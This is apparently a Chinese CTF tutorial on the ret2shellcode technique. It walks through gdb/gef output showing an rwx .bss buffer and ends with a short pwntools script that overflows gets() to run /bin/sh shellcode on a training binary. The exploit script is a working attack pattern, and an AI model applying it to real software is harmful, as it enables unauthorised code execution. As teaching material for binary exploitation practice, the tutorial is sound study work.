基本ROP之ret2shellcode

原理

控制程序执行shellcode代码

shellcode指的是用于完成某个功能的汇编代码，常见的功能主要是获取目标系统的shell。

一般来说，shellcode需要我们自己进行填充，这其实是一种典型的利用方法。

执行条件：

对应二进制在执行时，shellcode所在区域需要可执行的权限。

过程

下载地址

查看程序保护机制

毫无保护

IDA看下汇编指令

发现gets危险函数
同时还有将字符串复制到buf2处

双击buf2，查看buf2地址

buf2地址发现为bss段地址，bss段地址看注

动态调试程序，查看bss段地址权限

gef➤  b main
Breakpoint 1 at 0x8048536: file ret2shellcode.c, line 8.
gef➤  r
Starting program: /mnt/hgfs/kali_share/pwn/ret2shellcode 
BFD: /usr/lib/debug/.build-id/8b/9c8982bae57ff88bd7af7ad42cb91b889c06b3.debug: unable to initialize decompress status for section .debug_aranges
BFD: /usr/lib/debug/.build-id/8b/9c8982bae57ff88bd7af7ad42cb91b889c06b3.debug: unable to initialize decompress status for section .debug_aranges
warning: File "/usr/lib/debug/.build-id/8b/9c8982bae57ff88bd7af7ad42cb91b889c06b3.debug" has no build-id, file skipped
BFD: /usr/lib/debug/.build-id/49/d71c5358691415db0c9d0767301c4000a3ea84.debug: unable to initialize decompress status for section .debug_aranges
BFD: /usr/lib/debug/.build-id/49/d71c5358691415db0c9d0767301c4000a3ea84.debug: unable to initialize decompress status for section .debug_aranges
warning: File "/usr/lib/debug/.build-id/49/d71c5358691415db0c9d0767301c4000a3ea84.debug" has no build-id, file skippedBreakpoint 1, main () at ret2shellcode.c:8
8	ret2shellcode.c: 没有那个文件或目录.
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────── registers ────
$eax   : 0xb7fb0548  →  0xbffff3dc  →  0xbffff582  →  "SHELL=/bin/bash"
$ebx   : 0x0       
$ecx   : 0xfba387c8
$edx   : 0xbffff364  →  0x00000000
$esp   : 0xbffff2b0  →  0x00000000
$ebp   : 0xbffff338  →  0x00000000
$esi   : 0xb7fae000  →  0x001d6d6c ("lm"?)
$edi   : 0xb7fae000  →  0x001d6d6c ("lm"?)
$eip   : 0x08048536  →  <main+9> mov eax, ds:0x804a060
$eflags: [zero CARRY parity adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0073 $ss: 0x007b $ds: 0x007b $es: 0x007b $fs: 0x0000 $gs: 0x0033 
───────────────────────────────────────────────────────────────────── stack ────
0xbffff2b0│+0x0000: 0x00000000	 ← $esp
0xbffff2b4│+0x0004: 0x00c10000
0xbffff2b8│+0x0008: 0x00000001
0xbffff2bc│+0x000c: 0xb7ffe840  →  0x00000000
0xbffff2c0│+0x0010: 0xbffff310  →  0x00000001
0xbffff2c4│+0x0014: 0x00000000
0xbffff2c8│+0x0018: 0xb7fff000  →  0x00028f38
0xbffff2cc│+0x001c: 0x00000000
─────────────────────────────────────────────────────────────── code:x86:32 ────0x804852e <main+1>         mov    ebp, esp0x8048530 <main+3>         and    esp, 0xfffffff00x8048533 <main+6>         add    esp, 0xffffff80→  0x8048536 <main+9>         mov    eax, ds:0x804a0600x804853b <main+14>        mov    DWORD PTR [esp+0xc], 0x00x8048543 <main+22>        mov    DWORD PTR [esp+0x8], 0x20x804854b <main+30>        mov    DWORD PTR [esp+0x4], 0x00x8048553 <main+38>        mov    DWORD PTR [esp], eax0x8048556 <main+41>        call   0x8048410 <setvbuf@plt>
─────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "ret2shellcode", stopped, reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[#0] 0x8048536 → main()
────────────────────────────────────────────────────────────────────────────────
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────── registers ────
$eax   : 0xb7fb0548  →  0xbffff3dc  →  0xbffff582  →  "SHELL=/bin/bash"
$ebx   : 0x0       
$ecx   : 0xfba387c8
$edx   : 0xbffff364  →  0x00000000
$esp   : 0xbffff2b0  →  0x00000000
$ebp   : 0xbffff338  →  0x00000000
$esi   : 0xb7fae000  →  0x001d6d6c ("lm"?)
$edi   : 0xb7fae000  →  0x001d6d6c ("lm"?)
$eip   : 0x08048536  →  <main+9> mov eax, ds:0x804a060
$eflags: [zero CARRY parity adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0073 $ss: 0x007b $ds: 0x007b $es: 0x007b $fs: 0x0000 $gs: 0x0033 
───────────────────────────────────────────────────────────────────── stack ────
0xbffff2b0│+0x0000: 0x00000000	 ← $esp
0xbffff2b4│+0x0004: 0x00c10000
0xbffff2b8│+0x0008: 0x00000001
0xbffff2bc│+0x000c: 0xb7ffe840  →  0x00000000
0xbffff2c0│+0x0010: 0xbffff310  →  0x00000001
0xbffff2c4│+0x0014: 0x00000000
0xbffff2c8│+0x0018: 0xb7fff000  →  0x00028f38
0xbffff2cc│+0x001c: 0x00000000
─────────────────────────────────────────────────────────────── code:x86:32 ────0x804852e <main+1>         mov    ebp, esp0x8048530 <main+3>         and    esp, 0xfffffff00x8048533 <main+6>         add    esp, 0xffffff80→  0x8048536 <main+9>         mov    eax, ds:0x804a0600x804853b <main+14>        mov    DWORD PTR [esp+0xc], 0x00x8048543 <main+22>        mov    DWORD PTR [esp+0x8], 0x20x804854b <main+30>        mov    DWORD PTR [esp+0x4], 0x00x8048553 <main+38>        mov    DWORD PTR [esp], eax0x8048556 <main+41>        call   0x8048410 <setvbuf@plt>
─────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "ret2shellcode", stopped, reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[#0] 0x8048536 → main()
────────────────────────────────────────────────────────────────────────────────
gef➤  vmmap
Start      End        Offset     Perm Path
0x08048000 0x08049000 0x00000000 r-x /mnt/hgfs/kali_share/pwn/ret2shellcode
0x08049000 0x0804a000 0x00000000 r-x /mnt/hgfs/kali_share/pwn/ret2shellcode
0x0804a000 0x0804b000 0x00001000 rwx /mnt/hgfs/kali_share/pwn/ret2shellcode
0xb7dd7000 0xb7df4000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.29.so
0xb7df4000 0xb7fac000 0x0001d000 r-x /lib/i386-linux-gnu/libc-2.29.so
0xb7fac000 0xb7fae000 0x001d4000 r-x /lib/i386-linux-gnu/libc-2.29.so
0xb7fae000 0xb7fb0000 0x001d6000 rwx /lib/i386-linux-gnu/libc-2.29.so
0xb7fb0000 0xb7fb2000 0x00000000 rwx 
0xb7fcf000 0xb7fd1000 0x00000000 rwx 
0xb7fd1000 0xb7fd4000 0x00000000 r-- [vvar]
0xb7fd4000 0xb7fd6000 0x00000000 r-x [vdso]
0xb7fd6000 0xb7fd7000 0x00000000 r-x /lib/i386-linux-gnu/ld-2.29.so
0xb7fd7000 0xb7ffd000 0x00001000 r-x /lib/i386-linux-gnu/ld-2.29.so
0xb7ffe000 0xb7fff000 0x00027000 r-x /lib/i386-linux-gnu/ld-2.29.so
0xb7fff000 0xb8000000 0x00028000 rwx /lib/i386-linux-gnu/ld-2.29.so
0xbffdf000 0xc0000000 0x00000000 rwx [stack]

发现0804A080地址在下面所述地址中间，具有读写执行的权限，可以向里面写shellcode（汇编后的），并执行。

0x0804a000 0x0804b000 0x00001000 rwx /mnt/hgfs/kali_share/pwn/ret2shellcode

找偏移，写数据

找偏移地址的方法跟上篇博客一样

不过在此次的payload编写中，用到一个函数ljust这个函数

ljust函数介绍链接

其中字符串长度为十进制，需要把找到的偏移地址十六进制转为十进制，再+4

from pwn import *sh = process('./ret2shellcode')shellcode = asm(shellcraft.sh())
#生成汇编后的shellcode
buf = 0x0804A080print shellcode.ljust(112, 'a')sh.sendline(shellcode.ljust(112, 'a') + p32(buf))sh.interactive()